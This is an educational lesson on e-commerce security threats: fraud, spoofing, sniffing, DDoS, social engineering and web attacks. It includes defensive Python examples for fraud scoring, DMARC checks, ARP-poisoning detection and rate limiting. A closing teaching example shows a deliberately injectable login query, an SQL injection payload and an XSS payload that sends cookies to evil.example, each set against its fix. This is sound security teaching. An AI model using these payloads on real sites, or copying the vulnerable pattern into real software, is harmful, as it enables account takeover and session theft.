4.1 Security Threats in E-Commerce
E-commerce sites are prime targets for cyberattackers because they handle:
- Money (credit cards, bank credentials)
- Personal data (name, address, phone)
- Trust signals (login credentials, OTPs)
The CIA Triad — security goals
Every e-commerce security mechanism aims at one of three goals (the CIA Triad):
| Goal | Meaning | Example Attack |
|---|---|---|
| Confidentiality | Data stays private | Eavesdropping, sniffing |
| Integrity | Data not altered (in transit or at rest) | Man-in-the-middle, tampering |
| Availability | System stays accessible | DoS / DDoS |
Plus three more (the Extended Triad for commerce):
| Goal | Meaning | Example Attack |
|---|---|---|
| Authenticity | Sender / receiver verified | Spoofing, phishing |
| Authorisation | Acting party has permission | Privilege escalation |
| Non-repudiation | Sender cannot deny later | Forged signatures |
---
Categories of Security Threats
| Category | Examples |
|---|---|
| Cybercrimes | Hacking, malware, ransomware |
| Fraud | Credit card fraud, identity theft, phishing |
| Network attacks | Spoofing, sniffing, DoS, DDoS, MITM |
| Application attacks | SQL injection, XSS, CSRF |
| Insider threats | Malicious employees, accidental leaks |
| Physical | Theft of hardware, device loss |
---
1. Cybercrimes — broad category
Any criminal activity involving a computer or network. Includes:
| Crime | Description | Indian Law |
|---|---|---|
| Hacking | Unauthorised access | IT Act 2000 §66 (3-year imprisonment, ₹5 lakh fine) |
| Identity theft | Stealing identity for fraud | §66C |
| Cyberstalking | Repeated harassment online | §354D IPC |
| Cyberterrorism | Attacks on critical infra | §66F (life imprisonment) |
| Data theft | Stealing data | §43(b) read with §66 (§66B covers dishonestly receiving a stolen computer resource or device) |
| Defamation | False online statements | §499 IPC |
| Obscene content | Distributing obscene material | §67 IT Act |
| Phishing | Fake login pages to steal credentials | §66D |
| Online gambling | Illegal in most states | State acts |
Note: the IPC was replaced by the Bharatiya Nyaya Sanhita (BNS) 2023 with effect from 1 July 2024; stalking is now BNS §78 and defamation BNS §356. The IT Act sections are unchanged.
Famous Indian cybercrime cases
- AIIMS Delhi ransomware (2022) — 15 days outage, allegedly Chinese-origin
- Maharashtra eSeva fraud (2018) — ₹76 crore stolen via fake portals
- Cosmos Bank heist (2018) — ₹94 crore lost in coordinated ATM withdrawals globally
- Mumbai Westside fraud (2016) — Hong Kong-based attackers cleared ₹100 crore
---
2. Credit Card Fraud / Theft
Common credit card frauds
| Fraud | Description |
|---|---|
| Skimming | Device on ATM/POS captures magnetic stripe |
| Phishing | Fake bank email asks for CVV / OTP |
| Vishing | Phone call impersonating bank |
| Smishing | SMS phishing |
| Card cloning | Magnetic stripe data copied to fake card |
| Card-Not-Present (CNP) fraud | Stolen card details used online |
| Account takeover | Login credentials hijacked → cards added |
| Friendly fraud | Customer disputes legit transaction (chargeback abuse) |
| Application fraud | Fake application with stolen identity |
| First-party fraud | Customer never intended to pay |
Mitigation
- EMV chip — replaces magnetic stripe (cloning much harder)
- 3D Secure / OTP — for online transactions
- CVV — never store at merchant (PCI-DSS)
- Tokenisation — actual card never seen by merchant
- Fraud detection ML — pattern recognition (unusual location, amount)
- Velocity checks — too many txns in short time → flag
- Geolocation — txn from unusual country → flag
- Device fingerprinting — track device characteristics
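The velocity, geolocation and device checks above are simple to state but easy to get subtly wrong (the current transaction must not be allowed to "whitewash" its own profile, and old timestamps must fall out of the window). The following is an added example, not code from the lesson, showing them as one scoring pass a merchant could run before sending the authorisation request; the thresholds, field names and sample transactions are assumptions.

```python
"""Rule-based card-fraud screening over a constructed transaction stream.

Added example, not part of the lesson: it implements three of the mitigations
listed above (velocity checks, geolocation checks, an amount anomaly) plus a
device-fingerprint check as a scoring function run before authorisation.
Field names, thresholds and the sample transactions are assumptions.
"""
from __future__ import annotations
from collections import deque
from dataclasses import dataclass, field

VELOCITY_WINDOW = 600   # seconds: count transactions per card inside this window
VELOCITY_LIMIT = 3      # this many already in the window raises the velocity flag
REVIEW_SCORE = 40       # flag for manual review
DECLINE_SCORE = 70      # decline outright


@dataclass
class Txn:
    card: str       # merchant-side token, never the PAN (PCI-DSS)
    ts: int         # unix seconds
    amount: float   # INR
    country: str    # country from BIN / IP geolocation
    device: str     # device-fingerprint hash


@dataclass
class CardProfile:
    home_country: str
    typical_amount: float                         # exponential moving average
    recent: deque = field(default_factory=deque)  # timestamps inside the window
    devices: set = field(default_factory=set)


class FraudScreen:
    def __init__(self) -> None:
        self.profiles: dict[str, CardProfile] = {}

    def score(self, t: Txn) -> tuple[int, list[str]]:
        p = self.profiles.setdefault(t.card, CardProfile(t.country, t.amount))
        score, reasons = 0, []

        # Velocity: evict timestamps that fell out of the window, then count.
        while p.recent and t.ts - p.recent[0] > VELOCITY_WINDOW:
            p.recent.popleft()
        if len(p.recent) >= VELOCITY_LIMIT:
            score += 40
            reasons.append("velocity")

        # Geolocation: transaction country differs from the card's usual one.
        if t.country != p.home_country:
            score += 30
            reasons.append("geo")

        # Amount anomaly: far above what this card usually spends.
        if t.amount > 5 * p.typical_amount:
            score += 25
            reasons.append("amount")

        # Device fingerprint never seen with this card before.
        if p.devices and t.device not in p.devices:
            score += 15
            reasons.append("new-device")

        # Update the profile after scoring so the current txn cannot whitewash itself.
        p.recent.append(t.ts)
        p.devices.add(t.device)
        p.typical_amount = 0.7 * p.typical_amount + 0.3 * t.amount
        return score, reasons

    def decide(self, t: Txn) -> tuple[str, int, list[str]]:
        score, reasons = self.score(t)
        if score >= DECLINE_SCORE:
            return "DECLINE", score, reasons
        if score >= REVIEW_SCORE:
            return "REVIEW", score, reasons
        return "APPROVE", score, reasons


# Constructed sample stream (not real data).
SAMPLE_TXNS = [
    Txn("tok_A", 1000, 1200.0, "IN", "dev1"),
    Txn("tok_A", 1100, 900.0, "IN", "dev1"),
    Txn("tok_A", 1150, 1500.0, "IN", "dev1"),
    Txn("tok_A", 1200, 1100.0, "IN", "dev1"),  # 4th in 10 min -> velocity flag
    Txn("tok_A", 1300, 9000.0, "RO", "dev9"),  # foreign, ~7x typical, new device
    Txn("tok_B", 5000, 400.0, "IN", "dev2"),
    Txn("tok_B", 9000, 450.0, "IN", "dev2"),   # window expired, clean
]


def screen(txns=SAMPLE_TXNS) -> list[tuple[str, int, list[str]]]:
    fs = FraudScreen()
    return [fs.decide(t) for t in txns]


if __name__ == "__main__":
    for t, (verdict, s, why) in zip(SAMPLE_TXNS, screen()):
        print(f"{t.card} {t.amount:>8.2f} {t.country} -> {verdict:7} score={s:3} {why}")
```

The fourth tok_A transaction trips only the velocity rule and lands in review; the fifth trips all four rules and is declined. A real system replaces the fixed weights with a trained model, but the feature engineering (window eviction, profile updated only after scoring) is the same.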
---
3. Identity Fraud
Identity fraud = unauthorised use of someone's personal information for criminal/financial gain.
Common identity fraud techniques
| Technique | How it Works |
|---|---|
| Phishing | Email with fake login page |
| Vishing | Phone call asking for OTP |
| Smishing | SMS phishing |
| Pharming | DNS poisoning redirects to fake site |
| Data breach | Stolen credentials from compromised DB |
| Social engineering | Trick employee into revealing info |
| Dumpster diving | Discarded documents with PII |
| Aadhaar misuse | Leaked Aadhaar number plus a captured OTP or biometric used to reach linked accounts (e.g. AePS withdrawals) |
Defences
- Multi-factor authentication
- Email/SMS alerts on changes
- Credit freeze (US has it; India doesn't easily)
- CIBIL alerts for new credit applications
- Don't share OTPs (banks never ask)
---
4. Spoofing
Spoofing = pretending to be someone you're not.
| Type | Description |
|---|---|
| Email spoofing | Forge "From" header |
| IP spoofing | Forge source IP address in packets |
| MAC spoofing | Forge hardware address |
| DNS spoofing / DNS poisoning | Redirect domain to attacker's server |
| Caller ID spoofing | Show wrong number on caller display |
| Website spoofing | Look-alike site mimicking the real one (e.g. hdfcbank-secure.com or a homoglyph of the bank's domain) |
| GPS spoofing | Fake GPS coordinates |
| ARP spoofing | Send fake ARP messages on local network |
Defences
- DNS over HTTPS / DNSSEC
- Email auth (SPF, DKIM, DMARC)
- VPN on untrusted networks (tunnels past ARP/DNS spoofing on the local segment; does nothing against a spoofed email or look-alike site)
- URL inspection before clicking
- Multi-factor auth
- HTTPS everywhere
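SPF and DKIM on their own do not stop email spoofing: an attacker can send from a domain they own that passes both checks perfectly while the From header still says the bank. What closes the gap is DMARC alignment, which ties the SPF and DKIM identifiers to the From domain the user sees. The following is an added example, not code from the lesson, that evaluates DMARC from a received message's headers; the Authentication-Results header is assumed to have been written by the receiving mail server, and the DMARC records, domains and messages are constructed. Organisational-domain derivation is simplified (real implementations use the Public Suffix List).

```python
"""DMARC evaluation from a received message's headers.

Added example, not part of the lesson: shows why SPF and DKIM alone do not stop
header-From spoofing and what DMARC alignment adds. The Authentication-Results
header is assumed to have been written by the receiving MTA; the DMARC records,
domains and messages are constructed for the example.
"""
from __future__ import annotations
import email
from email import policy

# Constructed stand-in for the TXT record at _dmarc.<domain>.
DMARC_RECORDS = {
    "hdfcbank.example": "v=DMARC1; p=reject; adkim=r; aspf=r; rua=mailto:dmarc@hdfcbank.example",
}


def org_domain(domain: str) -> str:
    """Relaxed alignment compares organisational domains. Assumed here to be
    the last two labels; production code must consult the Public Suffix List."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def parse_dmarc(record: str) -> dict:
    tags = {}
    for kv in record.split(";"):
        if "=" in kv:
            k, v = kv.strip().split("=", 1)
            tags[k.strip()] = v.strip()
    return tags


def parse_auth_results(value: str) -> dict:
    """'mx.example; spf=pass smtp.mailfrom=a@b; dkim=pass header.d=b'
    -> {'spf': ('pass', {'smtp.mailfrom': 'a@b'}), 'dkim': ('pass', {'header.d': 'b'})}"""
    results = {}
    for clause in value.split(";")[1:]:          # first segment is the authserv-id
        tokens = clause.split()
        if not tokens:
            continue
        method, _, verdict = tokens[0].partition("=")
        props = dict(tok.split("=", 1) for tok in tokens[1:] if "=" in tok)
        results[method] = (verdict, props)
    return results


def aligned(identifier_domain: str, from_domain: str, mode: str) -> bool:
    if not identifier_domain:
        return False
    if mode == "s":                                # strict: exact match
        return identifier_domain.lower() == from_domain.lower()
    return org_domain(identifier_domain) == org_domain(from_domain)


def evaluate_dmarc(raw_message: str) -> tuple[str, str]:
    """Return (dmarc_result, disposition) for a message already checked by the MTA."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    from_domain = msg["From"].addresses[0].domain      # the address the user sees
    record_txt = DMARC_RECORDS.get(org_domain(from_domain))
    if record_txt is None:
        return "none", "deliver"                       # no policy published: nothing to enforce
    record = parse_dmarc(record_txt)
    ar = parse_auth_results(str(msg["Authentication-Results"]))

    spf_verdict, spf_props = ar.get("spf", ("none", {}))
    spf_domain = spf_props.get("smtp.mailfrom", "").split("@")[-1]
    spf_ok = spf_verdict == "pass" and aligned(spf_domain, from_domain, record.get("aspf", "r"))

    dkim_verdict, dkim_props = ar.get("dkim", ("none", {}))
    dkim_ok = dkim_verdict == "pass" and aligned(dkim_props.get("header.d", ""), from_domain, record.get("adkim", "r"))

    if spf_ok or dkim_ok:
        return "pass", "deliver"
    disposition = {"reject": "reject", "quarantine": "quarantine"}.get(record.get("p", "none"), "deliver")
    return "fail", disposition


# Constructed messages. The bank's genuine mail: bounce domain is a subdomain,
# DKIM signed by the bank, so both identifiers align under relaxed mode.
LEGIT = (
    "From: HDFC Bank <alerts@hdfcbank.example>\n"
    "Return-Path: <bounce@bounce.hdfcbank.example>\n"
    "Authentication-Results: mx.example; spf=pass smtp.mailfrom=bounce@bounce.hdfcbank.example; "
    "dkim=pass header.d=hdfcbank.example\n"
    "Subject: Your statement is ready\n\nSee attached.\n"
)
# Spoof: the attacker's own domain passes SPF and DKIM, but neither identifier
# aligns with the From header the victim sees.
SPOOF = (
    "From: HDFC Bank <alerts@hdfcbank.example>\n"
    "Return-Path: <blast@mail-blast.example>\n"
    "Authentication-Results: mx.example; spf=pass smtp.mailfrom=blast@mail-blast.example; "
    "dkim=pass header.d=mail-blast.example\n"
    "Subject: Verify your account now\n\nClick here.\n"
)
# Look-alike domain: DMARC cannot help, because the attacker controls the From domain.
LOOKALIKE = (
    "From: HDFC Bank <alerts@hdfcbank-secure.example>\n"
    "Return-Path: <alerts@hdfcbank-secure.example>\n"
    "Authentication-Results: mx.example; spf=pass smtp.mailfrom=alerts@hdfcbank-secure.example; "
    "dkim=pass header.d=hdfcbank-secure.example\n"
    "Subject: Verify your account now\n\nClick here.\n"
)

if __name__ == "__main__":
    for name, raw in [("legit", LEGIT), ("spoof", SPOOF), ("lookalike", LOOKALIKE)]:
        print(name, evaluate_dmarc(raw))
```

The spoofed message is rejected only because the bank publishes p=reject; with p=none it would be delivered and merely reported. The look-alike case is the caveat: DMARC protects a domain you own, not your customers from domains that merely resemble it, which is why URL inspection and MFA stay on the defence list.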
---
5. Sniffing
Sniffing (also eavesdropping, packet capture) = intercepting network traffic to read its contents.
Types
Sniffing comes in several flavours:
- Passive sniffing: on legacy hub-based networks (or any shared medium such as open Wi-Fi) every frame reaches every host, so the sniffer just listens; nothing has to be manipulated.
- Active sniffing: on a switched network each port sees only its own unicast traffic, so the attacker must first redirect it, typically with ARP poisoning (answering "who has the gateway?" with the attacker's MAC) or by flooding the switch's MAC table until it fails open and behaves like a hub.
- Wireless sniffing: captures Wi-Fi frames from the air. Trivial on open or WEP networks; WPA2/WPA3 encrypt each client's traffic with per-session keys, although WPA2-Personal traffic can still be decrypted by anyone who knows the passphrase and captured the client's four-way handshake.
- MITM (Man-in-the-Middle): the active form, where the attacker sits between the two parties, reads everything and can alter messages in either direction.
- SSL stripping: a MITM variant in which the attacker intercepts the victim's initial plain-HTTP request (for example, the user typed the domain without https://), keeps the victim on HTTP and proxies to the real site over HTTPS. The browser never shows a certificate warning because it never attempted TLS; HSTS (and HSTS preloading) is the defence.
Tools (used by both attackers and pen-testers)
- Wireshark — packet analysis
- tcpdump — command-line packet capture
- Ettercap — MITM toolkit
- Bettercap — modern MITM tool
Defences
- HTTPS — encrypts traffic (more in next lesson)
- VPN — encrypts everything in tunnel
- WPA2/3 WiFi — strong wireless encryption
- Avoid public WiFi for sensitive transactions
- Certificate pinning in apps
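Because active sniffing on a switched LAN depends on forged ARP replies, it leaves a footprint a host or sensor can see: an IP whose MAC binding suddenly changes, or a single MAC that starts answering for several IPs (the gateway and the victim at once). The following is an added example, not code from the lesson, of that detection logic run over a constructed stream of ARP "is-at" replies; in practice the events would come from arpwatch or a packet capture.

```python
"""ARP-poisoning detector over a constructed stream of ARP replies.

Added example, not part of the lesson: the active-sniffing / MITM setup works
by sending forged "is-at" replies so that victims map the gateway's IP to the
attacker's MAC. A sensor that remembers the IP->MAC bindings it has seen can
catch the two tell-tale signs: an IP whose MAC suddenly changes, and one MAC
that claims several IPs. The event list is constructed.
"""
from __future__ import annotations
from collections import defaultdict


class ArpWatch:
    def __init__(self) -> None:
        self.table: dict[str, str] = {}                   # ip -> last seen mac
        self.ips_by_mac: dict[str, set] = defaultdict(set)
        self.alerts: list[tuple] = []

    def observe(self, ts: float, ip: str, mac: str) -> None:
        mac = mac.lower()
        previous = self.table.get(ip)
        if previous is not None and previous != mac:
            # Binding flipped: classic poisoning (or a DHCP reassignment; tune per network).
            self.alerts.append((ts, "MAC_CHANGE", ip, previous, mac))
        self.table[ip] = mac

        before = len(self.ips_by_mac[mac])
        self.ips_by_mac[mac].add(ip)
        after = len(self.ips_by_mac[mac])
        if after > before and after > 1:
            # Same MAC now answers for more than one IP: it is impersonating both
            # ends of a conversation (gateway and victim). Alert once per new IP,
            # not on every periodic re-poison.
            self.alerts.append((ts, "MULTI_IP", mac, tuple(sorted(self.ips_by_mac[mac]))))


# Constructed ARP "is-at" replies: (seconds, sender IP, sender MAC).
ARP_EVENTS = [
    (0.0, "10.0.0.1", "aa:aa:aa:aa:aa:01"),    # real gateway
    (0.5, "10.0.0.20", "aa:aa:aa:aa:aa:20"),   # victim laptop
    (1.0, "10.0.0.30", "aa:aa:aa:aa:aa:30"),
    (5.0, "10.0.0.1", "de:ad:be:ef:00:99"),    # attacker claims the gateway IP
    (5.1, "10.0.0.20", "de:ad:be:ef:00:99"),   # ... and the victim's IP (two-way MITM)
    (5.6, "10.0.0.1", "de:ad:be:ef:00:99"),    # periodic re-poison, not a new alert
]


def detect(events=ARP_EVENTS) -> list[tuple]:
    watch = ArpWatch()
    for ts, ip, mac in events:
        watch.observe(ts, ip, mac)
    return watch.alerts


if __name__ == "__main__":
    for alert in detect():
        print(alert)
```

Three alerts come out of the sample: two binding changes (gateway, then victim) and one MULTI_IP alert when the attacker's MAC claims its second address. The repeated poison at 5.6 s is silent, which matters in practice because attackers re-send forged replies every few seconds to keep caches poisoned.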
---
6. DoS and DDoS Attacks
DoS (Denial of Service) = make a system unavailable to legitimate users. DDoS (Distributed DoS) = many machines flood the target simultaneously.
Types
DoS/DDoS attacks fall into four broad categories:
- Volumetric: flood the target's bandwidth so legitimate packets cannot get through (UDP floods, ICMP floods). Measured in Gbps or Tbps.
- Protocol: exhaust finite connection state in the server or in middleboxes (firewalls, load balancers). A SYN flood opens half-open TCP connections faster than they time out (SYN cookies are the stack-level fix); "Ping of Death" sent oversized, fragmented ICMP packets that crashed older stacks on reassembly.
- Application-layer: requests that look legitimate but are chosen to be expensive. Slowloris holds many HTTP connections open by sending headers a few bytes at a time; an HTTP flood hammers costly endpoints (search, login, checkout) until worker threads are exhausted. Measured in requests per second (RPS).
- Amplification / reflection: a small request with a spoofed source IP (the victim's) is sent to a public service that answers with a much larger response, so the attacker's bandwidth is multiplied: roughly 30-50x for open DNS resolvers, about 500x for NTP monlist, and up to about 50,000x for exposed memcached servers. This is how the 2018 GitHub attack reached 1.35 Tbps from a modest amount of attacker bandwidth.
Famous DDoS incidents
| Year | Target | Magnitude |
|---|---|---|
| 2016 | Dyn DNS | Took down Twitter, Netflix, Spotify; ~1 Tbps |
| 2018 | GitHub | 1.35 Tbps (memcached amplification) |
| 2020 | AWS | 2.3 Tbps |
| 2022 | Google Cloud | 46 million RPS |
| 2023 | Cloudflare | 71 million RPS (February) |
| 2023 | Cloudflare, Google, AWS | HTTP/2 "Rapid Reset" (CVE-2023-44487): 201 million RPS at Cloudflare, 398 million RPS at Google |
Defences
| Defence | How it Helps |
|---|---|
| CDN / Anti-DDoS service | Cloudflare, AWS Shield, Akamai filter at edge |
| Rate limiting | Cap requests per IP/user |
| CAPTCHA | Differentiate human vs bot |
| Geoblocking | Block traffic from regions you don't serve |
| Load balancing + auto-scaling | Absorb the load |
| DDoS scrubbing | Specialised filtering services |
| BGP blackhole (RTBH) | ISP drops all traffic to the attacked IP upstream, sacrificing that host to keep the rest of the network up; source-based RTBH drops traffic from attacker prefixes instead |
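Rate limiting is the defence most teams implement themselves, and the usual mistake is to key it only by client IP: a single flooder is stopped, but a botnet spreading the same load over thousands of addresses stays under every per-IP cap. The following is an added example, not code from the lesson, that composes a per-IP sliding-window limiter with a global budget for an expensive endpoint; the limits, paths and request stream are constructed.

```python
"""Sliding-window rate limiting against an HTTP flood, with the caveat that
per-IP limits alone do not stop a distributed flood.

Added example, not part of the lesson: two limiters are composed, one keyed by
client IP and one global budget for an expensive endpoint (/search). The
request stream is constructed: one legitimate shopper, one single-source
flooder, and twenty low-rate bot IPs that stay under the per-IP limit and are
only caught by the endpoint budget. Limits and paths are assumptions.
"""
from __future__ import annotations
from collections import Counter, defaultdict, deque


class SlidingWindowLimiter:
    def __init__(self, limit: int, window: float) -> None:
        self.limit, self.window = limit, window
        self.hits: dict[str, deque] = defaultdict(deque)

    def allow(self, key: str, now: float) -> bool:
        q = self.hits[key]
        while q and now - q[0] >= self.window:   # evict timestamps outside the window
            q.popleft()
        if len(q) >= self.limit:
            return False                          # rejected requests are not counted
        q.append(now)
        return True


class EdgeGate:
    """What a CDN/WAF edge rule would do before the request reaches the app."""

    def __init__(self) -> None:
        self.per_ip = SlidingWindowLimiter(limit=10, window=10.0)
        # Global budgets only for endpoints that are expensive to serve.
        self.endpoint_budget = {"/search": SlidingWindowLimiter(limit=30, window=10.0)}

    def check(self, ip: str, path: str, now: float) -> str:
        if not self.per_ip.allow(ip, now):
            return "ip-limit"
        budget = self.endpoint_budget.get(path)
        if budget is not None and not budget.allow(path, now):
            return "endpoint-budget"
        return "ok"


def build_requests() -> list[tuple[float, str, str]]:
    """Constructed request log (time, ip, path), sorted by time."""
    reqs = [(float(t), "203.0.113.7", "/product/42") for t in (0, 2, 4, 6, 8)]  # legit shopper
    reqs += [(1.0 + i * 0.01, "198.51.100.9", "/search") for i in range(30)]   # one IP, 30 req/s
    reqs += [(3.0 + i * 0.02, f"192.0.2.{i // 2 + 1}", "/search") for i in range(40)]  # 20 bots x 2
    return sorted(reqs)


def simulate(requests=None) -> Counter:
    gate = EdgeGate()
    verdicts: Counter = Counter()
    for now, ip, path in (requests or build_requests()):
        verdicts[gate.check(ip, path, now)] += 1
    return verdicts


if __name__ == "__main__":
    print(simulate())   # expected: ok 35, ip-limit 20, endpoint-budget 20
```

The single-source flooder loses 20 of 30 requests to the per-IP cap, while the 40 bot requests all pass it and are only cut by the /search budget. Two caveats a practitioner should carry: this runs at the edge (CDN, WAF), not inside the app, and under a true volumetric flood the packets never reach anything that could run it, which is what scrubbing and RTBH are for.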
---
7. Social Engineering
The human element — tricking people instead of breaking technology.
| Technique | Description |
|---|---|
| Phishing | Fake email with malicious link |
| Spear phishing | Targeted at specific person |
| Whaling | Targeted at executives |
| Pretexting | Pose as authority (HR, IT) |
| Baiting | USB drives in parking lot |
| Tailgating | Follow employee through secure door |
| Quid pro quo | "I'll help you in exchange for credentials" |
Famous social engineering attacks
- Kevin Mitnick — popularised the technique in the 1980s-90s, talking his way into telecom and corporate systems
- Twitter hack 2020 — 130 high-profile accounts (Obama, Musk, Apple) compromised via social engineering of Twitter employees
- Indian SIM-swap frauds — telecom employee tricked into porting victim's number
Defences
- Security awareness training
- Verify via second channel before acting on email
- Don't trust authority claims in unsolicited contact
- Banks don't ask for OTP (memorise this)
- Look at full URL before entering credentials
---
8. Application-Layer Attacks
| Attack | Description | OWASP Top 10 (2021) |
|---|---|---|
| SQL Injection | Inject SQL via input that is concatenated into a query | A03 Injection |
| XSS (Cross-Site Scripting) | Inject JS into pages other users view | A03 Injection |
| CSRF (Cross-Site Request Forgery) | Trick a logged-in user's browser into sending an unwanted request | No longer a separate entry (dropped in 2017); CWE-352 now sits under A01 |
| Insecure Deserialization | Untrusted serialised objects executed on parsing | A08 Software and Data Integrity Failures |
| Broken Access Control | Access pages/data/actions you shouldn't | A01 |
| Sensitive Data Exposure | Weak or missing encryption exposes data | A02 Cryptographic Failures |
| XXE (XML External Entities) | Exploit XML parsers that resolve external entities | A05 Security Misconfiguration |
| SSRF (Server-Side Request Forgery) | Make server fetch attacker-controlled URL | A10 |
Famous app-attack incidents
- Equifax (2017) — 147 million records via Apache Struts vulnerability
- British Airways (2018) — JS supply-chain attack, 500K customers exposed
- Magecart attacks (ongoing) — JS-injection on e-commerce sites siphons card data
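SQL injection and XSS are both the same mistake in different places: untrusted input is pasted into text that some interpreter (the database, the browser) will then execute. The following is an added example, not code from the lesson, showing a login query and a review renderer each written the way they are usually broken and then the way they should be; the schema, users and payloads are constructed, and SHA-256 stands in for the slow password hash (bcrypt/argon2) real code uses.

```python
"""SQL injection and stored XSS: the vulnerable form beside the fixed form.

Added example, not part of the lesson: a minimal login query and a comment
renderer for an e-commerce site, each written the way it is usually broken and
then the way it should be. Standard library only (sqlite3, html, hashlib). The
schema, users and payloads are constructed; SHA-256 stands in for the slow
password hash (bcrypt/argon2) that real code uses.
"""
import hashlib
import html
import sqlite3


def pw_hash(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()   # placeholder for bcrypt/argon2


def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT UNIQUE, pw_hash TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (id, email, pw_hash, role) VALUES (?, ?, ?, ?)",
        [
            (1, "admin@shop.example", pw_hash("correct horse battery staple"), "admin"),
            (2, "asha@customer.example", pw_hash("hunter2"), "customer"),
        ],
    )
    return conn


# --- SQL injection -----------------------------------------------------------

SQLI_PAYLOAD = "admin@shop.example' --"


def login_vulnerable(conn, email: str, password: str):
    """User input is concatenated into the SQL text, so the input can rewrite the query.
    With email = "admin@shop.example' --" the rest of the WHERE clause becomes a comment
    and the password is never checked."""
    query = (
        f"SELECT id, role FROM users WHERE email = '{email}' "
        f"AND pw_hash = '{pw_hash(password)}'"
    )
    return conn.execute(query).fetchone()


def login_safe(conn, email: str, password: str):
    """Parameterised query: the driver sends values separately from the SQL text,
    so quotes and comment markers in the input are just data."""
    query = "SELECT id, role FROM users WHERE email = ? AND pw_hash = ?"
    return conn.execute(query, (email, pw_hash(password))).fetchone()


# --- Stored XSS --------------------------------------------------------------

XSS_PAYLOAD = "<script>new Image().src='https://evil.example/c?'+document.cookie</script>"


def render_comment_vulnerable(text: str) -> str:
    """Raw interpolation: a stored review becomes markup in every viewer's browser."""
    return f'<p class="review">{text}</p>'


def render_comment_safe(text: str) -> str:
    """Output encoding for the HTML-text context. Attribute, URL and JS contexts
    need their own encoders; a Content-Security-Policy header limits the damage
    if one is missed."""
    return f'<p class="review">{html.escape(text, quote=True)}</p>'


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable login with payload:", login_vulnerable(db, SQLI_PAYLOAD, "wrong"))
    print("safe login with payload:      ", login_safe(db, SQLI_PAYLOAD, "wrong"))
    print(render_comment_vulnerable(XSS_PAYLOAD))
    print(render_comment_safe(XSS_PAYLOAD))
```

The vulnerable login returns the admin row with a wrong password; the parameterised one returns nothing because no account has that literal email. Note that the fix is structural, not a blocklist of quote characters: escaping input by hand is how XSS filters and SQL "sanitisers" keep getting bypassed.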
---
Key Terms — Lesson 4.1
Security has its own dense vocabulary. The terms below cover the threats catalogued in this lesson and the conceptual frameworks an examiner expects you to invoke.
CIA Triad — The classic information-security framework: Confidentiality (data stays private), Integrity (data is not altered), Availability (system stays usable). Every security control maps to one or more legs of the triad. The extended triad adds Authenticity (parties are who they claim to be), Authorisation (parties can do what they're attempting), and Non-repudiation (a sender cannot later deny their action).
Cybercrime — Any criminal activity that uses or targets a computer or network. In India, the IT Act 2000 (with 2008 amendments) is the primary statute, supplemented by the IPC for related offences. Section 66 covers hacking and data theft; 66C identity theft; 66D phishing; 66F cyberterrorism (life imprisonment); 67 obscene content.
Hacking — Unauthorised access to a computer or network. Section 66 of the IT Act prescribes up to 3 years' imprisonment and ₹5 lakh fine. "Ethical hacking" (penetration testing with the owner's consent) is legal and a recognised profession.
Identity Theft — Stealing someone's personal identifiers (Aadhaar number, PAN, bank credentials, OTP, biometric) and using them to commit fraud. Covered under Section 66C of the IT Act. Common in India through SIM-swap, phishing, fake KYC calls, and document misuse.
Phishing — Deceptive communication (usually email or a fake website) that impersonates a trusted entity to trick the victim into revealing credentials, OTPs, or card data. Variants include spear phishing (targeted at a specific individual), whaling (targeted at C-level executives), vishing (voice phishing — phone call), smishing (SMS phishing), and angler phishing (fake customer-support handles on social media).
Pharming — A more sophisticated cousin of phishing where the attacker poisons DNS (locally on the victim's device or upstream at the resolver) so that even typing the correct URL leads to a fake site. Pharming is harder to detect because the URL bar shows the legitimate domain.
Skimming — Physical capture of card data using a device illegally attached to an ATM card slot or a POS terminal. The skimmer reads the magnetic stripe; a tiny camera or PIN-pad overlay captures the PIN. EMV chip cards make cloning a chip transaction impractical, but skimming persists wherever magnetic-stripe fallback is still accepted, and "shimming" (a thin insert that sits between the chip and the reader) is the newer variant.
Card-Not-Present (CNP) Fraud — Fraudulent use of stolen card data in an online context, where the physical card is not required. 3D Secure / OTP, tokenisation, and fraud-detection ML are the main defences.
Account Takeover (ATO) — When an attacker gains control of a user's e-commerce or banking account — through credential stuffing, phishing, SIM-swap, or password reuse — and then drains the linked payment method, redirects deliveries, or sells the account on the dark web.
Friendly Fraud / Chargeback Abuse — When a legitimate customer disputes a real transaction with their card issuer (claiming "I didn't authorise this" or "I didn't receive the goods"), pocketing both the product and the refund. Merchants fight friendly fraud with delivery proofs, signature capture, and chargeback-arbitration tools.
Spoofing — A class of attacks where the attacker forges identity information at some protocol level. Email spoofing forges the From header; IP spoofing forges source IP; DNS spoofing / poisoning redirects a domain to the attacker's server; website spoofing uses look-alike URLs (hdfcbank-secure.com); caller-ID spoofing displays a fake calling number; ARP spoofing is used inside MITM attacks on local networks.
Sniffing / Packet Capture — Intercepting network packets to read their contents. Passive sniffing just listens; active sniffing uses ARP poisoning or rogue access points. Tools include Wireshark, tcpdump, Ettercap, and Bettercap. The primary defence is end-to-end encryption (HTTPS, VPN).
Man-in-the-Middle (MITM) — An active interception attack where the attacker sits between the two communicating parties, reading and potentially modifying the traffic. MITM requires either compromised infrastructure (rogue Wi-Fi, ARP poisoning) or a successful spoofing primitive (DNS, IP). TLS certificate validation is the primary defence; certificate pinning hardens it further.
SSL Stripping — A MITM technique where the attacker downgrades the victim's intended HTTPS connection to plain HTTP, then forwards the (now visible) traffic to the real server over HTTPS. Modern browsers warn aggressively against HTTP-only sites for this reason; HSTS (HTTP Strict Transport Security) headers tell the browser "always HTTPS for this domain".
Denial of Service (DoS) — An attack that makes a system unavailable to legitimate users. DoS uses one machine; DDoS (Distributed DoS) uses thousands or millions, usually a botnet of compromised devices.
DDoS (Distributed DoS) — A coordinated DoS attack from many machines. Four main categories: volumetric (bandwidth flood), protocol (resource exhaustion — SYN flood, Ping of Death), application-layer (Slowloris, HTTP flood), and amplification (DNS, NTP, memcached reflection). The largest publicly disclosed attacks have reached hundreds of millions of requests per second (the 2023 HTTP/2 Rapid Reset attacks on Cloudflare and Google) and more than 2 Tbps (AWS, 2020).
Amplification / Reflection Attack — A DDoS technique where the attacker sends a small spoofed request (with the victim's IP as the source) to a public service (open DNS resolver, NTP server, memcached) that returns a much larger response — multiplying the attacker's bandwidth by 50× to 50,000×.
